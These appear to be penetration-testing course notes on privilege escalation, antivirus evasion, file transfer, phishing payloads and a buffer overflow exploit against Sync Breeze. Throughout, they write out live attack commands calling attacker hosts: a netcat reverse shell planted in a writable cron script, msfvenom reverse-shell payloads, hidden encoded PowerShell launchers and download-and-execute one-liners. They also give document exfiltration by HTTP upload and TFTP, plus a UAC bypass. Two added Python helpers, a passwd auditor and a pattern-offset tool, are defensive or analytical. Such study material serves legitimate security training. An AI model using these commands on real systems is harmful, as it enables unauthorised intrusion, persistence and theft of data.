Reverse shell cheat sheet:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Inspect the cron log for running jobs:
grep "CRON" /var/log/cron.log
The job runs every 5 minutes.
ls -lah shows its permissions (rwxrwxrwx: world-writable).
Add the following to the script (see the reverse shell cheat sheet above):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f
If a password hash is present in the second column of an /etc/passwd user record, it is considered valid for authentication and takes precedence over the corresponding entry in /etc/shadow, if one exists.
Generate such a hash (for the password "evil"):
openssl passwd evil
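A defender's check for the /etc/passwd condition just described, added here as an example (it is not from the original notes): it parses passwd-format text and flags records whose second field is anything other than a shadow placeholder, and also flags empty password fields and extra UID 0 accounts, which goes slightly beyond the note. The sample records and the hash value are constructed.

```python
import re

# Constructed sample, not taken from the original notes. The "evil" line
# carries a placeholder in the $1$salt$hash layout that `openssl passwd`
# prints; it is not a real credential.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
n00b:x:1000:1000:n00b:/home/n00b:/bin/bash
evil:$1$PLACEHLD$placeholderhashvalue00:0:0:root:/root:/bin/bash
legacy::1001:1001:legacy:/home/legacy:/bin/sh
"""

# Values that make libc/PAM consult /etc/shadow or treat the account as locked.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}
# $1$ md5crypt, $2*$ bcrypt, $5$/$6$ sha-crypt, $y$ yescrypt
CRYPT_PREFIX = re.compile(r"^\$(1|2[abxy]?|5|6|y)\$")


def audit_passwd(text):
    """Return (line, user, finding) tuples for records whose password field
    would be used directly, bypassing /etc/shadow, plus extra UID 0 accounts."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed record"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((lineno, user,
                             "empty password field: passwordless login if nullok"))
        elif pw not in SHADOW_PLACEHOLDERS:
            kind = "crypt hash" if CRYPT_PREFIX.match(pw) else "unexpected token"
            findings.append((lineno, user,
                             f"{kind} in passwd field overrides the shadow entry"))
        if uid == "0" and user != "root":
            findings.append((lineno, user, "extra account with UID 0"))
    return findings


if __name__ == "__main__":
    for lineno, user, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {user}: {finding}")
```

Run it against a real file with `audit_passwd(open("/etc/passwd").read())`; a clean system returns an empty list.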
Lab machine: ssh n00b@10.11.0.129
Inspect the /etc/issue file for the distribution and version.
uname -r
searchsploit linux kernel ubuntu 16.04
The exploit must match the architecture of the target machine.
Kali Linux has wordlists stored in /usr/share/wordlists/.
If a system service binary has insecure permissions, we can replace the binary; when the system reboots, the replaced binary is executed with the service's (SYSTEM) permissions.
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Services stored under the Program Files directory are more prone to insecure permissions.
icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
adduser.c starts with:
#include <stdlib.h>
Cross compile it: i686-w64-mingw32-gcc adduser.c -o adduser.exe
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
C:\Users\student> net stop Serviio
C:\Users\student> wmic service where caption="Serviio" get name, caption, state, startmode
Caption  Name     StartMode  State
Serviio  Serviio  Auto       Running
Check if the user can reboot the system:
C:\Users\student> whoami /priv
"Disabled" means the privilege is not enabled for the running process (in our case whoami), not that the user lacks it.
shutdown /r /t 0
/r reboot, /t 0 wait 0 seconds
rdesktop xx.xx.xx.xx -u evil -p <password> -g 1024x768
Check if the new user is in the Administrators group:
net localgroup Administrators
Lab login (same rdesktop options): 10.11.0.23 -u n00b -p lab
When a file or directory path contains spaces, the developer should make sure it is quoted; an unquoted "C:\Program Files\..." service path may otherwise be resolved as:
C:\Program.exe
Determine the version and architecture:
C:\> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
Try to find third-party driver vulnerabilities first:
driverquery /v
/v for verbose output
Look for third-party drivers, then search for known issues:
searchsploit USBPcap
To begin, we will list the contents of the Program Files directory, in search of the USBPcap directory:
cd "C:\Program Files"
Use the client machine to compile.
Set up the PATH environment variable:
C:\Program Files\mingw-w64\i686-7.2.0-posix-dwarf-rt_v5-rev1> mingw-w64.bat
Windows automated enumeration tool:
c:\Tools\privilege_escalation\windows-privesc-check-master> windows-privesc-check2.exe
-h help
--dump dump output
-G list groups
Linux:
./unix-privesc-check standard > output.txt
An access token is assigned to a user at logon.
A security identifier (SID) is unique to each object, including access tokens, user accounts and group accounts.
Integrity mechanism:
From Windows Vista onward, processes run on four integrity levels:
• System integrity process: SYSTEM rights
• High integrity process: administrative rights
• Medium integrity process: standard user rights
• Low integrity process: very restricted rights, often used in sandboxed processes
Even when logged in as an administrator, we operate at Medium integrity level; to switch, specify run as administrator:
powershell.exe Start-Process cmd.exe -Verb runAs
Runs cmd.exe as administrator.
UAC: credential prompt (for standard users) and consent prompt (for administrators).
A UAC bypass allows an administrator user to silently elevate the integrity level from medium to high without a prompt.
Leverage a UAC bypass based on fodhelper.exe:
C:\Windows\System32\fodhelper.exe
In order to gather detailed information regarding the fodhelper integrity level and the permissions required to run this process, we will inspect its application manifest.
Dump the manifest of fodhelper.exe using the Sysinternals suite:
cd C:\Tools\privilege_escalation\SysinternalsSuite
<requestedPrivileges>
Enumerating users: whoami
works on both Windows and Linux
Windows: net user <username>
Linux: id
Reveal other users:
Windows: net user
Linux: cat /etc/passwd
Enumerating the hostname: hostname
Windows: systeminfo
Linux: cat /etc/issue
cat /etc/*-release
uname -a
Running processes, Windows: tasklist /SVC
/SVC displays the services hosted in each process.
Does not list tasks run by privileged users.
Linux: ps aux
Windows: ipconfig /all
route print (routing information)
netstat -ano (network connections)
-a display all active TCP connections
-n display addresses and port numbers in numerical form
-o display the owning process ID associated with each connection
Linux: ifconfig -a
ip a
/sbin/route
ss -anp
netstat -anp
Windows: netsh advfirewall show currentprofile
List the firewall rules: netsh advfirewall firewall show rule name=all
Linux: root privileges are normally required to read the firewall rules directly.
For example, the iptables-persistent package on Debian Linux saves firewall rules in specific files under the /etc/iptables directory by default. These files are used by the system to restore netfilter rules at boot time. These files are often left with weak permissions, allowing them to be read by any local user on the target system.
grep -Hs iptables /etc/*
-H display the file name with each match
-s suppress error messages
Windows: schtasks /query /fo LIST /v
The /query argument displays tasks and /FO LIST sets the output format to a simple list. We can also use /V to request verbose output.
Linux:
The Linux-based job scheduler is known as Cron. Scheduled tasks are listed under the /etc/cron.* directories.
ls -lah /etc/cron* (sometimes needs elevated permissions)
-h human-readable sizes
cat /etc/crontab
If those scripts have weak permissions, we can change them and escalate privileges.
wmic product get name, version, vendor
We can use wmic with the product WMI class argument followed by get, which, as the name states, is used to retrieve specific property values. We can then choose the properties we are interested in, such as name, version, and vendor.
Note: the product class only lists applications installed by the Windows Installer.
Similarly, and more importantly, wmic can also be used to list system-wide updates by querying the Win32_QuickFixEngineering (qfe) WMI class:
wmic qfe get Caption, Description, HotFixID, InstalledOn
Linux:
Debian based: dpkg -l
Red Hat based: rpm
AccessChk:
Enumerate the Program Files directory in search of any file or directory that grants the Everyone group write permissions.
We will use -u to suppress errors, -w to search for write access permissions, and -s to perform a recursive search.
accesschk.exe -uws "Everyone" "C:\Program Files"
PowerShell:
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Linux (-type d to locate directories):
find / -writable -type d 2>/dev/null
Windows: mountvol
On Linux-based systems, we can use the mount command to list all mounted filesystems. In addition, the /etc/fstab file lists all drives that will be mounted at boot time.
Use lsblk to view all available disks.
PowerShell:
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Find the version number of each module:
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
Linux:
lsmod
modinfo requires the full path name of the module to run.
First, on Windows systems, we should check the status of the AlwaysInstallElevated registry setting. If this key is enabled (set to 1) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer packages with elevated privileges.
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
If this setting is enabled, we could craft an MSI file and run it to elevate our privileges.
Linux:
Find SUID-marked binaries; such a binary is executed with the file owner's permissions:
find / -perm -u=s -type f 2>/dev/null
First generate a reverse shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe
Check detection: https://www.virustotal.com/#/home/upload
Signature-based detection is a blacklist technology:
a continuous series of bytes that uniquely identifies the malware -> defeated by changing or obfuscating the content
Heuristic-based detection is a detection method that relies on various rules and algorithms to determine whether or not an action is considered malicious.
Behavioral-based detection: this is often achieved by executing the file in question in an emulated environment, such as a small virtual machine, and looking for behaviors or actions that are considered malicious.
Packers: smaller, functionally equivalent executable -> new signature, bypasses older antivirus detection
Obfuscators: re-organize and mutate code so it is more difficult to reverse engineer (e.g. dead code)
Crypters: add a decryption step, decrypting in memory; the encrypted payload is invisible to static malware detection
Virtual machine emulation detection: detect whether the binary is executed in a virtual machine environment
PE injection: manipulation of the process's own memory; does not write anything to disk
Write their own version of the API to load a DLL in memory
Process hollowing: suspend a benign process, replace its image, then resume execution
Inline hooking: modify memory, inject a hook (handler) that redirects to malicious code
Target a specific anti-virus product
$code = '
Load the code into memory, then execute it with CreateThread, in a PowerShell script.
Prevented from execution:
C:\Users\offsec\Desktop> powershell .\av_test.ps1
Stealth mode: restore the execution of the original flow after the injected code finishes.
The session dies after the original code exits.
We can set up an AutoRunScript to migrate our Meterpreter to a separate process immediately after session creation:
set AutoRunScript post/windows/manage/migrate
searchsploit -m 42341
-m copies the exploit to the current directory
mingw-w64 is a cross-compiler:
sudo apt install mingw-w64
Make sure the certificate is ignored if the certificate check fails:
Python requests: the official documentation indicates that the SSL certificate will be ignored if we set the verify parameter to False.
On the client we open a listening shell: nc -nvlp 4444 -e /bin/bash
From the attack machine, connect to it: nc -nv xxx.xx.xx.xxx 4444
If we run ftp in this shell, we lose interactivity: input is not bound correctly (no pty).
nc -nvlp 4444 -e /bin/bash
nc -nv 192.168.148.44 4444
python -c 'import pty; pty.spawn("/bin/bash")'
We get a bash prompt: the pty shell works.
Non-interactive FTP download:
sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/
The home directory of the ftp user is set to /ftphome/.
C:\Users\offsec> echo open 10.11.0.4 21> ftp.txt
ftp options: -v to suppress any returned output, -n to suppress automatic login, and -s to indicate the name of our command file.
Use a VBScript downloader:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
C:\Users\Offsec> cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
Use PowerShell:
C:\Users\Offsec> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\Users\Offsec> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -
First, we must allow execution of PowerShell scripts (which is restricted by default) with the -ExecutionPolicy keyword and Bypass value. Next, we will use -NoLogo and -NonInteractive to hide the PowerShell logo banner and suppress the interactive PowerShell prompt, respectively. The -NoProfile keyword will prevent PowerShell from loading the default profile (which is not needed), and finally we specify the script file with -File.
One-line version:
C:\Users\Offsec> powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/evil.exe', 'new-exploit.exe')
C:\Users\Offsec> powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')
Download and execute without saving to disk.
upx -9 nc.exe
Compress the binary file.
exe2hex -x nc.exe -p nc.cmd
Convert the binary into a text (.cmd) form that rebuilds the executable on the target.
Pipe the file into the clipboard:
cat nc.cmd | xclip -selection clipboard
Paste it into the non-interactive shell.
Host an upload HTTP server (upload.php):
<?php
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads
powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
TFTP (older targets: Windows XP, 2003):
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
On Windows:
tftp -i 10.11.0.4 put important.docx
Googled for various known external corporate IP addresses and found one on a site that hosts collected user agent data from various affiliate sites.
Trick HR by sending them a document and asking what type of OS and browser they are using.
FingerprintJS
Use AJAX to POST the components array to the server.
sudo chown www-data:www-data fp
If a file is created with the extension .hta instead of .html, Internet Explorer will automatically interpret it as an HTML Application and offer the ability to execute it using the mshta.exe program.
Works with IE.
Similar to an HTML page, a typical HTML Application includes html, body, and script tags followed by JavaScript or VBScript code. However, since the HTML Application is executed outside the browser we are free to use legacy and dangerous features that are often blocked within the browser.
An additional window will open; add a close call to dismiss it.
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.148 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg
-nop no profile
-w hidden do not pop up a window
-e -EncodedCommand (base64-encoded command)
Sub AutoOpen()
We must save the containing document as either .docm or the older .doc format, which supports embedded macros, but must avoid the .docx format, which does not support them.
Insert a batch object into a Word file:
Change the presentation: display as icon, change the icon.
The caption can also be changed.
The user needs to click on the icon to launch the batch file.
START powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBj....
Execution of macros and embedded objects is blocked;
a bypass is to use another Office application.
https://www.securityfocus.com
A vulnerability database rather than an exploit database; the references may contain a PoC.
https://packetstormsecurity.com
It provides up-to-date information on security news and vulnerabilities as well as recently published tools by security vendors.
firefox --search "Microsoft Edge site:exploit-db.com"
Google operators: inurl, intext and intitle
SearchSploit:
sudo apt update && sudo apt install exploitdb
to make sure it is the latest
Exploits are stored under /usr/share/exploitdb/exploits/
kali@kali:~$ cd /usr/share/nmap/scripts
kali@kali:/usr/share/nmap/scripts$ grep Exploits *.nse
nmap --script-help=clamav-exec.nse
sudo nmap 10.11.0.128 -p- -sV -vv --open --reason
--open: only show open (or possibly open) ports
--reason: display the reason a port is in a particular state
msf-pattern_create -l 4379
eip = 0x46367046
msf-pattern_offset -q 46367046
-q, --query Aa0A  query to locate
offset = 4368
crash = "\x41" * 4368 + "B" * 4 + "C" * 7
Find a register that points to our buffer:
ESP points to the end of our buffer; only 7 bytes remain in the buffer, and increasing the buffer size does not work (it leads to another crash).
EAX points to the start of the buffer, including the "setup sound" string.
Right click -> go to expression (setup sound)
"se" -> decodes to jae (jump short if above or equal)
"tu" -> decodes to je (jump if equal)
not good: the string bytes decode to conditional jumps
Insert first-stage shellcode in the 7-byte space:
use it to align EAX to point to the string after "setup sound", then jump there
increase EAX by 12 as there are 12 chars in "setup sound"
kali@kali:~$ msf-nasm_shell
5 bytes of instructions: 83C00C (add eax,0xc) FFE0 (jmp eax)
padding = "\x41" * 4368
We sent the whole range of characters from 00 to FF within our buffer and then monitored whether any of those bytes got mangled, swapped, dropped, or changed in memory once they were processed by the application.
Bad chars found: 0x00 0x20
edb: Plugins -> OpcodeSearcher
Address found: 0x8134596
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.148 LPORT=443 -b "\x00\x20" -f py -v shellcode
Bad chars are excluded with -b, the output format is set with -f, and the variable name to use with -v.
The shell is stuck because of the debugger.
F2 set breakpoint
F9 run the program
F7 step into the function
Ctrl+F9 execute until the function returns
Use Wireshark to capture packets.
Capture filter: host 192.168.119.148 and host 192.168.148.10
Locate the /login page, right click -> Follow TCP Stream.
Apply display filters.
TCPView stored at: C:\Tools\windows_buffer_overflows
Find the process listening on port 80.
Run Immunity Debugger as administrator.
AAAABBBB, then AAAABBCC, then AAAABBCD until the EIP overwrite is located.
Generate a non-repeating pattern: msf-pattern_create -l 800
EIP replaced with 42306142
-> "B0aB" as written; in memory order (x86 is little-endian) the bytes are "Ba0B"
└─$ msf-pattern_offset -l 800 -q 42306142
Usually shellcode is 350 - 400 bytes long.
ESP points at the BBBBCCCC part of the buffer.
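Both pattern lookups in these notes (the 4379-byte pattern with EIP 0x46367046 giving offset 4368, and the 800-byte pattern with EIP 0x42306142 giving offset 780) can be reproduced offline with the following added example; it is not code from the notes or from Metasploit, but re-implements the cyclic pattern msf-pattern_create emits and the little-endian lookup msf-pattern_offset performs, which is why the register value reads "B0aB" but the buffer holds "Ba0B".

```python
import string
from itertools import product

# Added example, not code from the original notes: the Metasploit-style
# cyclic pattern (Aa0Aa1...Az9Ba0...) and the EIP-to-offset lookup, so a
# crash offset can be checked without the msf-* tools installed.


def cyclic_pattern(length):
    """Return the first `length` characters of the Aa0Aa1...Zz9 pattern.

    Every 3-char triple (upper, lower, digit) is unique, so any 4-byte window
    pins down exactly one position in the buffer; the full pattern is 20280
    characters and would repeat beyond that, so longer requests are refused.
    """
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern longer than 20280 bytes would repeat")
    chunks = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        chunks.append(upper + lower + digit)   # digit rolls over fastest
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def register_bytes(reg_hex):
    """Turn a 32-bit register value (e.g. "42306142") into the four ASCII
    characters as they sit in the buffer. x86 is little-endian, so the value
    shown by the debugger is the reverse of the byte order in memory."""
    return int(reg_hex, 16).to_bytes(4, "little").decode("ascii")


def pattern_offset(length, reg_hex):
    """Offset of the four bytes found in EIP within a pattern of `length`,
    or -1 when those bytes did not come from the pattern at all."""
    return cyclic_pattern(length).find(register_bytes(reg_hex))


if __name__ == "__main__":
    # The two crashes recorded in the notes.
    print(register_bytes("46367046"), pattern_offset(4379, "46367046"))  # Fp6F 4368
    print(register_bytes("42306142"), pattern_offset(800, "42306142"))   # Ba0B 780
```

A result of -1 means EIP was not overwritten by the pattern itself (e.g. it holds a return address or a pointer into other data), which is the first thing to rule out before building a filler of that length.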
filler = "A" * 780
eip = "B" * 4      # from the AAAABBBBCCCC layout above
offset = "C" * 4
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
inputBuffer = filler + eip + offset + badchars
Log data, item 7
Address=0BADF00D
Message= 0x00400000 | 0x00462000 | 0x00062000 | False | False | False | False | False | -1.0- [syncbrs.exe] (C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe)
However, this module's addresses start with 0x00 (a null byte, which is a bad char), so it cannot be used.
Log data, item 10
Address=0BADF00D
Message= 0x10000000 | 0x10223000 | 0x00223000 | False | False | False | False | False | -1.0- [libspp.dll] (C:\Program Files\Sync Breeze Enterprise\bin\libspp.dll)
Tip: if this application was compiled with DEP support, our JMP ESP
kali@kali:~$ msf-nasm_shell
nasm > jmp esp
00000000  FFE4              jmp esp
nasm >
!mona find -s "\xff\xe4" -m "libspp.dll"
Log data, item 3
Address=10090C83
Message= 0x10090c83 : “\xff\xe4” | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Sync Breeze Enterprise\bin\libspp.dll)
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.148 LPORT=443 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
The raw payload includes bad chars; encode it and exclude them:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.148 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
nops = "\x90" * 10
inputBuffer = filler + eip + offset + nops + shellcode
Start the listener:
sudo nc -lnvp 443
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.148 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
EXITFUNC=thread makes the payload exit only its own thread, so the service keeps running when the shell closes.